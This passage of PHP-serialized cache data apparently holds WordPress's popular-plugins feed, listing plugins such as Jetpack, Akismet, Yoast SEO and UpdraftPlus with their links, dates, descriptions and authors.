malware.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"Increase your traffic, view your stats, speed up your site, and protect yourself from hackers with Jetpack.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Yoast SEO\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:114:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Hello Dolly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/hello-dolly/#post-5790\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 May 2008 22:11:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"5790@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Google Analytics by MonsterInsights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"Connect Google Analytics with WordPress by adding your Google Analytics tracking code. Get the stats that matter.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Syed Balkhi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Page Builder by SiteOrigin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/siteorigin-panels/#post-51888\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Apr 2013 10:36:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"51888@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"Build responsive page layouts using the widgets you know and love using this simple drag and drop page builder.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Greg Priday\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Disable Comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/disable-comments/#post-26907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2011 04:42:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"26907@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"Allows administrators to globally disable comments on their site. Comments can be disabled according to post type. Multisite friendly.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Samir Shah\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WP Multibyte Patch\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wp-multibyte-patch/#post-28395\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 14 Jul 2011 12:22:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"28395@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Multibyte functionality enhancement for the WordPress Japanese package.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"plugin-master\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Black Studio TinyMCE Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/plugins/black-studio-tinymce-widget/#post-31973\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Nov 2011 15:06:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"31973@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"The visual editor widget for Wordpress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Marco Chiesi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"50539@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"Displays Google Analytics reports in your WordPress Dashboard. Inserts the latest Google Analytics tracking code in your pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:146:\"Take the guesswork out of WordPress security. iThemes Security offers 30+ ways to lock down WordPress in an easy-to-use WordPress security plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"iThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"UpdraftPlus Backup and Restoration\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/updraftplus/#post-38058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 May 2012 15:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"38058@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Anderson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Clef Two-Factor Authentication\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/wpclef/#post-47509\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 27 Dec 2012 01:25:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"47509@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"Modern two-factor that people love to use: strong authentication without passwords or tokens; single sign on/off; magical user 